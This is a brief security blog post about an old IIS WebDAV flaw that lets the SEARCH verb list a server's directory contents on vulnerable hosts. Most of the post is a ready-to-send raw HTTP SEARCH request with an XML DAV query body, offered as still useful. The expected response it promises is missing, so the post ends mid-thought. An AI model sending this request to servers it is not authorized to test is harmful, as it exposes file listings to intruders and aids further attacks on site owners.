Room362.com

Blatherings of a security addict.

IIS Search Verb Directory Listing

| Comments

This: http://www.securityfocus.com/bid/1756 still works (on vulnerable hosts, this is an old vuln) and is very useful:

Send this:

1
2
3
4
5
6
7
8
9
10
11
12
SEARCH / HTTP/1.1  
Host: target  
Content-Type: text/xml  
Content-Length: 133  
  
<?xml version="1.0"?>  
<g:searchrequest xmlns:g="DAV:">  
<g:sql>  
Select "DAV:displayname" from scope()  
</g:sql>  
</g:searchrequest>

And expect something like this back:

Comments